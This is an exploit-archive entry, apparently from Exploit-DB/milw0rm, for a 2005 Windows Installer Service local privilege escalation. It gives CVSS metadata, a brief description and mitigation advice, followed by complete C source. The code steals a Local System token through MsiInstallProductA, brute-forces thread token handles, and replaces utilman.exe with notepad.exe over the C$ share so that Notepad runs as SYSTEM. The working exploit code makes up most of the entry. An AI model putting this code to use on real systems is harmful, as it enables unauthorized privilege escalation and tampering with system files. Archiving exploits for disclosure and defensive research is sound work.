Windows Installer Service Local Privilege Escalation

vendor:

Windows

by:

milw0rm

7.5

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: Windows

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE: cpe:2.3:o:microsoft:windows

Metasploit:

Other Scripts:

Platforms Tested: Windows

2005

Windows Installer Service Local Privilege Escalation

This exploit takes advantage of a vulnerability in the Windows Installer Service to escalate privileges and impersonate the Local System account. It replaces the Utility Manager with Notepad, allowing the user to run Notepad as the Local System.

Mitigation:

Apply the latest security patches and updates from Microsoft. Limit user privileges to reduce the impact of this vulnerability. Monitor for any unauthorized changes to system files.

Source

Exploit-DB raw data:

/* Removed #include "stdafx.h" / str0ke */

#include <stdio.h>
#include <windows.h>

#define INFO_BUFFER_SIZE MAX_COMPUTERNAME_LENGTH + 1
#define PATH_SIZE INFO_BUFFER_SIZE + MAX_PATH + 4
typedef UINT (WINAPI* PFnMsiInstallProduct)(LPCSTR szPackagePath, LPCSTR szCommandLine);


int main(int argc, char* argv[])
{
HANDLE hToken,hThread;
HMODULE hMsi = 0;
CHAR infoBuf[INFO_BUFFER_SIZE];
DWORD bufCharCount = INFO_BUFFER_SIZE;
CHAR file1[PATH_SIZE]="\\\\";
CHAR file2[PATH_SIZE]="\\\\";
CHAR file3[PATH_SIZE]="\\\\";

//Get name of the computer. 
GetComputerName(infoBuf, &bufCharCount);

hThread=GetCurrentThread();
hMsi = LoadLibrary("msi.dll");

//Invoke windows installer service in order to steal a Local System account identity token.
//Curious? some internal LPC magic here, see *1*
PFnMsiInstallProduct MsiInstallProduct = 0;
MsiInstallProduct = (PFnMsiInstallProduct)GetProcAddress(hMsi, "MsiInstallProductA");
MsiInstallProduct("","");

//Get Local System account identity token and set it to current thread
hToken=(void*)0x1;
while(SetThreadToken(&hThread,hToken)==NULL){
hToken=(void*)((int)hToken+1);
}

strcat(file1,infoBuf);
strcat(file1,"\\C$\\winnt\\system32\\utilman.exe");

strcat(file2,infoBuf);
strcat(file2,"\\C$\\winnt\\system32\\utilmanback.exe");

strcat(file3,infoBuf);
strcat(file3,"\\C$\\winnt\\system32\\notepad.exe");

//Replace Utility Manager with Notepad impersonating Local System account
//BTW: fuck Windows file protection :)
if(!CopyFile(file1,file2, TRUE))
printf("CopyFile() failed: %d\n", GetLastError());
else
if(!CopyFile(file3,file1, FALSE))
printf("CopyFile() failed: %d\n", GetLastError());
else {
printf("\nPress WinKey+U to run Notepad as Local System\n");
printf("Remember to restore original utilman.exe from utilmanback.exe\n");
}

Sleep(5000);
return 0;
}

// milw0rm.com [2005-01-11]